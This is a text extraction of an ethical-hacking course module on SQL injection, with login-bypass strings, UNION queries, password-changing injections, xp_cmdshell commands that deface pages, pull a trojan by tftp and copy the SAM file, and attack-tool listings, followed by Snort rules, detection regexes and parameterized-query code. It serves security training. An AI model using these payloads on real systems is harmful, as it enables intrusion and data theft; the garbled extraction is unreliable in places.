Upload
mer-liss
View
222
Download
0
Embed Size (px)
Citation preview
8/20/2019 CEHv6.1 Module 19 SQL Injection
1/77
Ethical Hacking and
Countermeasures Version 6.1
o u eSQL Injection
8/20/2019 CEHv6.1 Module 19 SQL Injection
2/77
Scenario
Susan was an SQL programmer with a reputed firm. Sheordered an expensive anniversary gift for her husband
- -. ,shopping portal but was offering better deals, and waspromised delivery on anniversary day. She wanted to giveher husband a surprise gift. She was upset on theanniversary day as the gift she ordered was not delivered.She tried to contact the portal but in vain. After severalfailed attempts to contact the portal, she thought of taking
. What do you think, as an SQL programmer, Susan can do?
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
3/77
News
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Source: http://www.scmagazineus.com/
8/20/2019 CEHv6.1 Module 19 SQL Injection
4/77
Module Objective
This module will familiarize you with:
SQL Injection
Steps for performing SQL Injection
SQL Injection Techniques
SQL Injection in MySql
Attacking SQL servers
Automated Tools for SQL Injection
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Countermeasures
8/20/2019 CEHv6.1 Module 19 SQL Injection
5/77
Module Flow
Steps for performing SQL Injection Attacking SQL servers
Automated Tools for SQL InjectionSQL Injection Techniques
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
6/77
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
7/77
What is SQL Injection
SQL injection is a type of security exploit in which the attacker "injects",
access to resources, or make changes to data
It is a techni ue of in ectin S L commands to ex loit non-validated in ut vulnerabilities in a web application database backend
Pro rammers use se uential commands with user in ut makin it easier forattackers to inject commands
ac ers can execu e ar rary comman s roug e we app ca on
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
8/77
Exploiting Web Applications
SQL injection exploits web applications using client- supp e sq quer es
It enables an attacker to execute unauthorized SQLcommands
It also takes advantage of unsafe queries in webapplications and builds dynamic SQL queries
For example, when a user logs onto a web page by using a
,used
However, the attacker can use SQL injection to send
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
spec a y cra e user name an passwor e s apoison the original SQL query
8/20/2019 CEHv6.1 Module 19 SQL Injection
9/77
SQL Injection Steps
What do you need?
Any web browser
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Input validation attack occurs here on a website
8/20/2019 CEHv6.1 Module 19 SQL Injection
10/77
What Should You Look For
Try to look for pages that allow a user to submit data, for example: a log inpage, searc page, ee ac , etc.
Look for HTML pages that use POST or GET commands
If POST is used, you cannot see the parameters in the URL
Check the source code of the HTML to get information
For example, to check whether it is using POST or GET, look for the
tag in the source code:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
11/77
What If It Doesn’t Take Input
I nput s not g ven, c ec or pages e P, J P, I, or PHP
Check the URL that takes the following parameters:
• http:// www.xsecurity.com /index.asp?id=10
Example:
In the above example, attackers might attempt:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• http://www.xsecurity.com/index.asp?id=blah’ or 1=1--
8/20/2019 CEHv6.1 Module 19 SQL Injection
12/77
OLE DB Errors
The user-filled fields are enclosed by a single quotation mark ('). To test, tryusing as t e user name
The following error message will be displayed when a (') is entered into a forma s vu nera e o an n ec on a ac
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
If you get this error, then the website is vulnerable to an SQL injection attack
8/20/2019 CEHv6.1 Module 19 SQL Injection
13/77
Input Validation Attack
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Input validation attack occurs here on a website
8/20/2019 CEHv6.1 Module 19 SQL Injection
14/77
SQL Injection Techniques
bypass
forms
SQL Injection
Using the SELECTcommand
Used to retrieve datafrom the database
Using the INSERTcommand
Used to addinformation to the
database
Using SQL serverstored procedures
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
15/77
How to Test for SQL Injection
• blah’ or 1=1— • ’ = —
• Password:blah’ or 1=1— • http://search/index.asp?id=blah’ or 1=1--
• ‘ or 1=1--
Depending on the query, try the followingpossibilities:
• “ or 1=1--• ‘ or ‘a’=‘a• “ or “a”=“a• ‘ or ‘a’=‘a
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
16/77
How Does it Work
Attacker breaks into the system by injecting malformed SQL into the query
•strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "' AND Password='" + txtPassword.Text + "'";
Original SQL Query:
' ' ' '
In the case of the user entering a valid user name of "Paul"and a password of "password", strQry becomes:
But when the attacker enters ' Or 1=1 --, the query now becomes:
•SELECT Count(*) FROM Users WHERE UserName='' Or 1=1 --' AND Password=''
Because a pair of hyphens designates the beginning of acomment in SQL, the query becomes simply:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
•SELECT Count(*) FROM Users WHERE UserName='' Or 1=1
8/20/2019 CEHv6.1 Module 19 SQL Injection
17/77
8/20/2019 CEHv6.1 Module 19 SQL Injection
18/77
BadProductList.aspx.cs
private void cmdFilter_Click(object sender, System.EventArgs e) {
dgrProducts.CurrentPageIndex = 0;
bindDataGrid();
}
private void bindDataGrid() {
dgrProducts.DataSource = createDataView();
dgrProducts.DataBind();
}
private DataView createDataView() {
string strCnx =
"server=localhost;uid=sa;pwd=;database=northwind;";string strSQL = "SELECT ProductId, ProductName, " +
Attack Occurs Here
"QuantityPerUnit, UnitPrice FROM Products";
//This code is susceptible to SQL injection attacks.
if (txtFilter.Text.Length > 0) {
strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
}
SqlConnection cnx = new SqlConnection(strCnx);
SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
DataTable dtProducts = new DataTable();
sda.Fill(dtProducts);
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
return dtProducts.DefaultView;
}
8/20/2019 CEHv6.1 Module 19 SQL Injection
19/77
Executing Operating System
Use stored procedures like master..xp_cmdshell to performremote execution
• blah‘;exec master..xp cmdshell “insert OS command
Execute any OS commands
here” --
Ping a server• a ;exec mas er..xp_cm s e p ng . . . --
• ‘ “ * *
Directory listing
.. _ .
c:\directory.txt” --
Create a file
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• blah‘;exec master..xp_cmdshell “echo juggyboy-was-here> c:\juggyboy.txt” –-
8/20/2019 CEHv6.1 Module 19 SQL Injection
20/77
Executing Operating System
’Defacing a web page (assuming that write access isallowed due to misconfiguration)
• blah‘;exec master..xp_cmdshell “echo you-are-defaced >
c:\inetpub\www.root\index.htm” –-
• blah‘;exec master..xp_cmdshell “cmd.exe /c appname.exe” --
-
• blah‘;exec master..xp_cmdshell “tftp –i 10.0.0.4 GET trojan.exec:\trojan.exe” --
Upload a Trojan to the server
• ‘ “ –
Download a file from the server
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
.. _ . . .c:\winnt\repair\SAM SAM” --
8/20/2019 CEHv6.1 Module 19 SQL Injection
21/77
Getting Output of SQL Query
_
• blah‘;EXEC master..sp_makewebtask
Example
10.10.1.4 s are cre car . m ,•“SELECT * FROM CREDITCARD”
• The above command exports a table called credit card, to theattacker’s network share
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
22/77
Getting Data from the Database
Using UNION keyword
•http://xsecurity.com/index.asp?id=10 UNIONSELECT TOP 1 TABLE_NAME FROMINFORMATION SCHEMA.TABLES-- _
• To retrieve information from the above query, use:• SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES--
Using LIKE keyword
• http:// xsecurity.com /index.asp?id=10 UNION SELECTTOP 1 TABLE FROM INFORMATION_SCHEMA.TABLES WHERETABLE_NAME LIKE ‘%25LOGIN%25’--
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
23/77
How to Mine all Column Names
To map out all the column names of a table, type:
• http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERETABLE_NAME=‘admin_login’—-
To get to the next column name, use NOT IN( )
• http:// xsecurity.com /index.asp?id=10 UNION SELECT TOP1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERETABLE NAME=‘admin lo in’ WHERE COLUMN NAME NOT
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
IN(‘login_id’)--
8/20/2019 CEHv6.1 Module 19 SQL Injection
24/77
8/20/2019 CEHv6.1 Module 19 SQL Injection
25/77
How to Update/Insert Data into
ter gat er ng a o co umn names o a ta e, t s poss e to UPDATE
or INSERT records into it:
• Example to change the password for “yuri”:• http:// xsecurity.com /index.asp?id=10; UPDATE ‘admin_login’SET ‘password’ = ‘newboy5’ WHERE login_name=‘yuri’--
To INSERT a record:
• http:// xsecurity.com /index.asp?id=10; INSERTINTO‘admin_login’(‘login_id’,’login_name’,’password’,’details’) VALUES(111,’yuri2’,’newboy5’,’NA’)--
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
26/77
SQL Injection in Oracle
SQL Injection in Oracle can be
• UNIONS can be added to the existing statement to execute a
second statement
• SUBSELECTS can be added to the existing statements
• Data Definition Language (DDL) can be injected if DDL is used ina dynamic SQL string
• INSERTS, UPDATES, and DELETES can also be injected
• nonymous PL L oc n proce ures
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
27/77
SQL Injection in MySql Database
While coding with a MySql application, the injection vulnerability is notexp o te
It is difficult to trace the out ut
You can see an error because the value retrieved is passed on to multiple
In such situations, SELECT and UNION commands cannot be used
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
28/77
SQL Injection in MySql Database
’
or examp e: cons er a a a ase
“pizza:”
• http://www.xsecurity.com/pizza/index.php?a=post&s=reply&t=1'• To show the tables, type the query:
• mysql> SHOW TABLES;
•• mysql> SELECT USER();
• The following query shows the first byte of Admin's Hash:• mysql> SELECT SUBSTRING(user_password,1,1)FROM mb users WHERE user rou = 1;
• The following query shows the first byte of Admin's Hash as an ASCII number:• mysql> SELECT ASCII('5');
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
29/77
SQL Injection in MySql Database
’
repar ng e eques
• To inject SQL commands successfully, the request from any single quotes should be
• mysql> Select active_id FROM mb_active UNION SELECTIF(SUBSTRING(user_password,1, 1) = CHAR(53), BENCHMARK(1000000, MD5(CHAR(1))), null) FROM mb_users WHERE user_group = 1;
Exploiting the Vulnerability
• First, og in as a registere user wit t e rig ts to rep y to t e current t rea• http://127.0.0.1/pizza/index.php?a=post&s=reply&t=1 UNIONSELECT IF (SUBSTRING(user_password,1,1) = CHAR(53),BENCHMARK(1000000, MD5(CHAR(1))), null), null, null, null, null
= *
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
_ _
• You will see a slow down, because the first byte is CHAR(53), 5
8/20/2019 CEHv6.1 Module 19 SQL Injection
30/77
Attack Against SQL Servers
Techni ues Involved:
Understand SQL Server and extract the necessaryinformation from the SQL Server Resolution Service
List of servers by Osql-L probes
Sc.exe sweeping of services
Port scanning
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Use of commercial alternatives
8/20/2019 CEHv6.1 Module 19 SQL Injection
31/77
SQL Server Resolution Service
SSRS service is responsible for sending a response packet containing theconnection details of clients who send a specially formed request
The packet contains the details necessary to connect to the desired instance,
The SSRS has buffer overflow vulnerabilities that allow remote attackers tooverwrite portions of the system’s memory and execute arbitrary codes
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
32/77
Osql L- Probing
Osql L- Probing is a command-line utility provided by Microsoft with SQLServer 2000, that allows the user to issue queries to the server
Osql.exe includes a discovery switch (-L) that will poll the network looking
It returns a list of server names and instances, but without details about TCPports or netlibs
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
33/77
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
34/77
SQL Injection Automated Tools
SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
Database Scanner
SQLPoke
NGSSQLCrack
NGSSQuirreL
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
SQLPing v2.2
8/20/2019 CEHv6.1 Module 19 SQL Injection
35/77
Hacking Tool: SQLDict
Server
It tests if the accounts are strong enough toresist an attack
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Source: http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl
8/20/2019 CEHv6.1 Module 19 SQL Injection
36/77
Hacking Tool: SQLExec
This tool executes commands on compromised Microsoft SQL Servers by using xp_cmdshellstored procedure
It uses a default sa account with a NULL password
USAGE: SQLExec www.target.com
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Source: http://phoenix.liu.edu/
SQ S d A di i
8/20/2019 CEHv6.1 Module 19 SQL Injection
37/77
SQL Server Password Auditing
sqlbf tool is used to audit the strength of Microsoft SQL Server passwords offline
The tool can be used either in Brute-Force mode or in Dictionary attack mode
The performance on a 1GHZ pentium (256MB) machine is about 750,000 guesses/sec
To be able to perform an audit, the password hashes that are stored in the sysxlogins table
The hashes are easy to retrieve, although a privileged account is needed. The query to use would be:
• select name, password from master..sysxlogins
To perform a dictionary attack on the retrieved hashes:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• sqlbf -u hashes.txt -d dictionary.dic -r out.rep
8/20/2019 CEHv6.1 Module 19 SQL Injection
38/77
Hacking Tool: SQLSmack
SQLSmack is a Linux-based remote command execution for MSSQL
When provided with a valid user name and password, the tool permits theexecution of commands on a remote MS SQL Server, by piping them throughthe stored procedure master..xp_cmdshell
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
39/77
Hacking Tool: SQL2.exe
SQL2 is an UDP Buffer Overflow Remote Exploit hacking tool
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
40/77
sqlmap
sqlmap is an automatic SQL injection tool developed in Python
It performs an extensive database management system back-endfingerprint
•
Features:
• Retrieves usernames, tables, and columns• Enumerates the entire DBMS• Reads system files
It supports two SQL injection techniques:
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
•• Inband SQL injection, also known as UNION query SQL Injection
8/20/2019 CEHv6.1 Module 19 SQL Injection
41/77
sqlmap: Screenshot 1
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Enumerate Database Management System Users
8/20/2019 CEHv6.1 Module 19 SQL Injection
42/77
sqlmap: Screenshot 2
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Test for SQL injection on POSTed data
8/20/2019 CEHv6.1 Module 19 SQL Injection
43/77
sqlmap: Screenshot 3
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Test for SQL Injection and DBMS back-end Detection
8/20/2019 CEHv6.1 Module 19 SQL Injection
44/77
sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application
It erforms the followin :
• Fingerprints the remote SQL Server (version, user performing thequeries, user privileges, xp_cmdshell availability, and DB Server
• Bruteforces the 'sa' password• Privilege escalation to 'sa'• Creates a custom xp_cmdshell if the original one has been disabled
• Reverses scan in order to look for a port that can be used for a reverseshell
• Directs and reverses shell, both TCP and UDP
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
• ,
8/20/2019 CEHv6.1 Module 19 SQL Injection
45/77
Sqlninja: Screenshot 1
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
46/77
Sqlninja: Screenshot 2
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
47/77
Sqlninja: Screenshot 3
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
48/77
Sqlninja: Screenshot 4
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
l i j h
8/20/2019 CEHv6.1 Module 19 SQL Injection
49/77
Sqlninja: Screenshot 5
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
S l i j S h 6
8/20/2019 CEHv6.1 Module 19 SQL Injection
50/77
Sqlninja: Screenshot 6
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
SQLI
8/20/2019 CEHv6.1 Module 19 SQL Injection
51/77
SQLIer
SQLIer takes a vulnerable URL and attemptsto determine all necessar information toexploit SQL Injection vulnerability by itself,
requiring no user’s interaction
It can build a UNION SELECT querydesigned to brute force passwords out ofdatabase
To operate, this script does not use quotesin the exploit
n 8 character assword takes
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
approximately 1 minute to crack
SQLI S h t
8/20/2019 CEHv6.1 Module 19 SQL Injection
52/77
SQLIer: Screenshot
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
A t i SQL I j t
8/20/2019 CEHv6.1 Module 19 SQL Injection
53/77
Automagic SQL Injector
Automagic SQL Injector is an automated SQL injection tool designed tosave me n pene ra on es ng
It is only designed to work with vanilla Microsoft SQL injection holes w ere errors are returne
• Browses tables and dumps table data to a CSV file
eatures:
• p oa s es us ng t e e ug scr pt met o
• Comprises of Automagical UDP reverse shell• Has interactive xp_cmdshell (simulated cmd.exe shell)
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Automagic SQL Injector:
8/20/2019 CEHv6.1 Module 19 SQL Injection
54/77
g Q j
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Automagic SQL Injector:
8/20/2019 CEHv6.1 Module 19 SQL Injection
55/77
g Q j
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Absinthe
8/20/2019 CEHv6.1 Module 19 SQL Injection
56/77
Absinthe
Absinthe is a GUI-based tool that automates the process of downloadingt e sc ema an contents o a ata ase t at s vu nera e to nInjection
Features:
• as automate n ect on• Supports MS SQL Server, MSDE, Oracle, and Postgres• Has cookies / Additional HTTP Headers• Com rises of uer termination
• Additional text appended to queries• Supports use of proxies / proxy rotation• Has multiple filters for page profiling
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
•
Absinthe: Screenshot
8/20/2019 CEHv6.1 Module 19 SQL Injection
57/77
Absinthe: Screenshot
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
58/77
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Blind SQL Injection
8/20/2019 CEHv6.1 Module 19 SQL Injection
59/77
Blind SQL Injection
Blind S L in ection is a hackin method that allows anunauthorized attacker to access a database server
It is facilitated by a common coding blunder: programaccepts data from a client and executes SQL queries without
validating the client’s input
Attacker is then free to extract, modify, add, or deletecontent from the database
Attackers typically test for SQL injection vulnerabilities by
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
generate an invalid SQL query
Blind SQL Injection:
8/20/2019 CEHv6.1 Module 19 SQL Injection
60/77
To secure an application against SQL injection, developers must never allow-
The best protection is to isolate the web application from SQL
All SQL statements required by the application should be in storedprocedures and kept on a database server
Application should execute stored procedures using a safe interface such asJDBC’s CallableStatement or ADO’s Command Object
If arbitrary statements must be used, use PreparedStatements
’
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
statement before the user’s input is added, making it impossible to modify theactual SQL statement
Blind SQL Injection: Screenshot
8/20/2019 CEHv6.1 Module 19 SQL Injection
61/77
Blind SQL Injection: Screenshot
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Blind SQL Injection Schema
8/20/2019 CEHv6.1 Module 19 SQL Injection
62/77
Blind SQL Injection Schema
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
63/77
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
SQL Injection Countermeasures
8/20/2019 CEHv6.1 Module 19 SQL Injection
64/77
SQL Injection Countermeasures
Selection of Regular Expressions
Regular expressions for detection of SQL meta characters are:
• /(\%27)|(\')|(\-\-)|(\%23)|(#)/ix
In the above example, the regular expression would be added to thesnort rule as follows:
• alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS(msg:"SQL Injection - Paranoid";
flow:to_server,established;uricontent:".pl";pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack;sid:9099; rev:5;) Since “#” is not an HTML meta character, it will not be encoded by the
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
rowser
SQL Injection Countermeasures
8/20/2019 CEHv6.1 Module 19 SQL Injection
65/77
’
are:
• /((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/i
The regular expressions for a typical SQL injection attack are:
• /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix
• \w* -zero or more alphanumeric or underscore characters
• (\%27)|\' -the ubiquitous single-quote or its hex equivalent
• - “ ”
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
its upper and lower case hex equivalents
SQL Injection Countermeasures
8/20/2019 CEHv6.1 Module 19 SQL Injection
66/77
’The re ular ex ressions for detectin an SQL in ection attack usinUNI ONas a keyword:
• /((\%27)|(\'))union/ix
• ' -
• union - the keyword union
• The above expression can be used for SELECT, I NSERT, UPDATE, DELETE,and DROP keywords
The regular expressions for detecting SQL injection attacks on a MSSQL server:
• exec s + + s x p w+ x
• exec -the keyword required to run the stored or extended procedure• (\s|\+)+ -one or more white spaces, or their HTTP encoded equivalents
• (s|x)p -the letters “sp” or “xp” to identify stored or extended procedures,
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
respective y
• \w+ -one or more alphanumeric or underscore characters to complete the name ofthe procedure
Preventing SQL Injection
8/20/2019 CEHv6.1 Module 19 SQL Injection
67/77
Disable the verbose error messages
Protect the system account “sa”
Audit source codes:
• Escape single quotes• Input validation• Re ect known bad in ut
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
• Input bound checking
Preventing SQL Injection Attacks
8/20/2019 CEHv6.1 Module 19 SQL Injection
68/77
’ ’
• Validate all textbox entries using validation controls, regular expressions, code etc.
Never use dynamic SQL
• Use parameterized SQL or stored procedures
Never connect to a database using an admin-level account
• Use a imite access account to connect to t e ata ase
Do not store secrets in plain text
• Encrypt or hash passwords and other sensitive data; you should also encrypt theconnection strings
Exceptions should divulge minimal information
• Do not reveal much information in error messages; use custom errors to display
EC-CouncilCopyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
minimal information in the event of an unhandled error; set debug to false
GoodLogin.aspx.cs
8/20/2019 CEHv6.1 Module 19 SQL Injection
69/77
g p
private void cmdLogin_Click(object sender, System.EventArgs e) {
string strCnx = ConfigurationSettings.AppSettings["cnxNWindBad"];
usin S lConnection cnx = new S lConnection strCnx
{
SqlParameter prm;
cnx.Open();
string strQry =
"SELECT Count(*) FROM Users WHERE UserName=@username " +
"AND Password=@ assword";
int intRecs;
SqlCommand cmd = new SqlCommand(strQry, cnx);
cmd.CommandType= CommandType.Text;
prm = new SqlParameter("@username",SqlDbType.VarChar,50);
prm.Direction=ParameterDirection.Input;
prm.Value = txtUser.Text;cmd.Parameters.Add(prm);
prm = new SqlParameter("@password",SqlDbType.VarChar,50);
prm.Direction=ParameterDirection.Input;
prm.Value = txtPassword.Text;
cmd.Parameters.Add(prm);
intRecs = (int) cmd.ExecuteScalar();
if (intRecs>0) {
FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
}
else {
lblMsg.Text = "Login attempt failed.";
}
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
}
}
SQL Injection Blocking Tool: SQLBlock http://www sqlblock com
8/20/2019 CEHv6.1 Module 19 SQL Injection
70/77
http://www.sqlblock.com
SQLBlock is an ODBC/JDBC driver with a
patent pending SQL injection preventionfeature
It works as an ordinary ODBC/JDBC datasource, an mon ors every s a emen being executed
If the client application tries to execute any
un-allowed SQL statements, it blocks theexecution and sends an alert to theadministrator
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
SQLBlock: Screenshot
8/20/2019 CEHv6.1 Module 19 SQL Injection
71/77
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Acunetix Web Vulnerability
8/20/2019 CEHv6.1 Module 19 SQL Injection
72/77
detect and report any SQL
Injection vulnerabilities
Other features include:
• Cross site scripting / XSS vu nera es
• Google hacking vulnerabilities
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Source: http://www.acunetix.com
What Happened Next
8/20/2019 CEHv6.1 Module 19 SQL Injection
73/77
Susan searched the Internet for security vulnerabilities of a portal.
By chance, she got an online forum listing SQL vulnerabilities of e-
shopping4u.com. A SQL programmer herself, she crafted an SQL
registration form. And to her surprise, she was able to bypass all
input validations.
She could now access databases of e-shopping4u.com and play
with thousands of their customers’ records consisting of credit card
an ot er persona n ormat on. osses to e-s opp ng4u.com cou
be devastating.
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Summary
8/20/2019 CEHv6.1 Module 19 SQL Injection
74/77
SQL injection is an attack methodology that targets the data residing ina ata ase
It attempts to modify the parameters of a web-based application inorder to alter the S L statements that are arsed in order to retrievedata from the database
Database footprinting is the process of mapping the tables on the
,
Exploits occur due to coding errors as well as inadequate validation
Prevention involves enforcing better coding practices and database
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
75/77
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
76/77
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
8/20/2019 CEHv6.1 Module 19 SQL Injection
77/77
EC-CouncilCopyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited